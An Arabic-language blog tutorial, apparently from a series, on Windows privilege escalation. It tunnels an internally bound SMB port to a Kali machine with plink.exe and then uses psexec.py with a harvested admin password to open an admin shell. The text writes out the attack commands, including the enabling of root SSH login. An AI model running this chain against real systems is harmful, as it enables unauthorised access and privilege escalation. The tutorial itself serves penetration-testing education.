Windows PE Port Forwarding
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في هذي المقالة راح اشرح لكم عن كيف نرفع صلاحيتنا عن طريق Port Forwarding
خلونا نفهم اول شي ايش ال Port Forwarding بعض الاحيان بعد ماتخترق الجهاز يكون فيه بورتات داخلية هذي البورتات الداخلية ممكن تكون مصابة بثغرة معينة وشغالة بصلاحية عالية او انه ممكن تستفيد منها عموما ف رفع الصلاحيات.
ملاحظة: السيناريو جزء منه راح يعتمد على تكنينك سابق
راح نشوف السيناريو مع بعض وراح يوضح معكم كل شي
الشرح:
طيب اول شي انا داخل بيوزر محدود الصلاحية كالعادة اللي هو user
يعد كذا راح استخدم اداة winpease وشرحنا كيف ننلقها الى النظام المخترق في الاجزاء السابقة
راح نسوي رن لي winpease ونشوف النتائج مع بعض
نلاحظ انه لقي لنا الباسورد الخاص بالادمن عن طريق الريجستري
ملاحظة: قد شرحت هذا التكنيك قبل ف اللي وده يطلع عليه هذا هو stored-credentials
طيب لو نجي نسوي scan للبورتات عن طريق اداة Nmap عشان نشوف اذا بورت ال smb او ال RDP مفتوحين او لا عشان نسجل دخول بيوزر الادمن عن طريقهم
نلاحظ ان لا بورت ال smb مفتوح ولا ال RDP
طيب ممكن بورت ال smb او ال RDP مفتوح داخليا راح نعرف عن طريق امر:
netstat -a
نلاحظ انه فعلا بورت ال SMB مفتوح داخليا طيب كيف راح نتصل عليه ؟
راح نستخدم ال ssh واداة plink.exe عشان نقدر نفتح بورت على الكالي ومن خلال هذا البورت نقدر نمرر اتصالنا لبورت ال SMB الداخلي
الاداة على قيت اب: plink
طيب قبل نبدا لازم نعدل شي على اعدادات ال ssh
راح نروح لملف: etc/ssh/sshd_config/
ونبحث فيه عن PermitRootLogin ونغير قيمته الى yes ونشيل علامة الهاشتاق اللي قبله
بعد كذا تسوي ريستارت الى ال ssh عن طريق هذا الامر:
service ssh restart
بعد كذا ننقل اداة plink للجهاز المخترق وننفذ هذا الامر:
plink.exe [email protected] -R 445:127.0.0.1:445
طبعا انت راح تعدل على الامر بشي بسيط راح تحط بعد ال @ الايبي الخاص بالكالي والباقي اتركه زي ماهو
بعد كذا راح يطلبك الباسورد الخاص بالروت راح تحطه وبعد كذا راح يكون بورت ال SMB الداخلي الخاص بالوندوز مفتوح على الكالي
طيب خلونا نتاكد هل بورت ال SMB فعلا انفتح على الكالي او لا راح ننفذ هذا الامر عشان نتاكد:
netstat -tlp
زي مانلاحظ قدرنا نسحب بورت smb الداخلي الخاص بالوندوز واللحين نقدر نتصل فيه وندخل بالحساب الخاص بالادمن بما انه عندنا الباسورد
الان راح استخدم اداة psexec هذي الاداة راح اعطيها الايبي المحلي و اليوزر و الباسورد الخاص بالادمن وراح ترفع ملف خبيث وتفتح لك جلسة بصلاحية الادمن
psexec.py admin:[email protected] cmd
رابط الاداة على قيت اب:
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !